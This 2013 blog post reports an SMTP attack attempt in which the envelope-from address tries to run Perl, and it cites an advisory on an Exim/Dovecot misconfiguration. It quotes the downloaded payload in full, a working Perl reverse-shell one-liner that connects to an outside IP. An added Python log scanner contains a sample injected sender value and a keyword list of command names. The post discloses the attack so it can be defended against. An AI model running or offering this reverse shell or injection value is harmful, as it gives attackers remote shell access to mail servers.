Sunday, May 5, 2013

SMTP: envelope-from address tries to execute perl

earlier today, found this:
(and someone else, too.)
of course, no one wants to execute the downloaded file a.pl:
perl -e 'use Socket;$i="178.218.211.118";$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 
not sure which MTA is vulnerable, yet.

...in the meantime I found that RedTeam Pentesting GmbH has a detailed advisory on the problem: "Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution".
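As an added example (not code from the post or from the advisory): a small Python scanner over constructed Exim mainlog-style arrival lines that flags messages whose envelope-sender local-part carries shell metacharacters or a command name, the pattern the injected envelope-from above relies on. The log lines, message ids and addresses are constructed for the example.

```python
import re

# Constructed sample Exim mainlog lines (not real log data): one ordinary
# message, one null-sender bounce, and one whose envelope sender hides a
# shell command inside an RFC 5321 quoted local-part.
SAMPLE_LOG = """\
2013-05-05 09:12:01 1UYGb1-0002Xz-8K <= alice@example.org H=mail.example.org [192.0.2.7] P=esmtp S=2210
2013-05-05 09:20:45 1UYGjR-0002Yq-3P <= <> H=mx.example.org [192.0.2.8] P=esmtp S=980
2013-05-05 09:40:33 1UYH2Z-0003Qa-1D <= "`perl a.pl`"@example.net H=(bad.example) [203.0.113.9] P=esmtp S=1503
"""

# Characters a legitimate sender local-part has no use for, but which a
# shell acts on when the address is interpolated into a command line.
SHELL_META = re.compile(r'[`|;&<>$(){}\n]')
CMD_HINTS = ("perl", "sh -", "wget", "curl", "python")

def extract_sender(line):
    """Return the envelope sender from an Exim '<=' arrival line, or None.
    Quoted local-parts may contain spaces, so they are matched as a unit."""
    m = re.search(r'<= (".*?"@\S+|\S+)', line)
    return m.group(1) if m else None

def suspicious_reasons(sender):
    """List why an envelope sender looks injected (empty list means clean)."""
    if sender == "<>":          # null sender of a bounce: '<>' is not injection
        return []
    reasons = []
    local_part = sender.rsplit("@", 1)[0]
    if SHELL_META.search(local_part):
        reasons.append("shell metacharacters in local-part")
    if local_part.startswith('"') and " " in local_part:
        reasons.append("quoted local-part containing whitespace")
    if any(h in local_part.lower() for h in CMD_HINTS):
        reasons.append("command name in local-part")
    return reasons

def scan_log(text):
    """Return (message_id, sender, reasons) for every suspicious arrival line."""
    hits = []
    for line in text.splitlines():
        sender = extract_sender(line)
        if sender is None:
            continue
        reasons = suspicious_reasons(sender)
        if reasons:
            hits.append((line.split()[2], sender, reasons))
    return hits

if __name__ == "__main__":
    for msg_id, sender, reasons in scan_log(SAMPLE_LOG):
        print(msg_id, sender, "; ".join(reasons))
```

The same check belongs at the MTA itself (an ACL rejecting senders whose local-part contains these characters), but scanning existing logs shows whether such addresses have already been accepted.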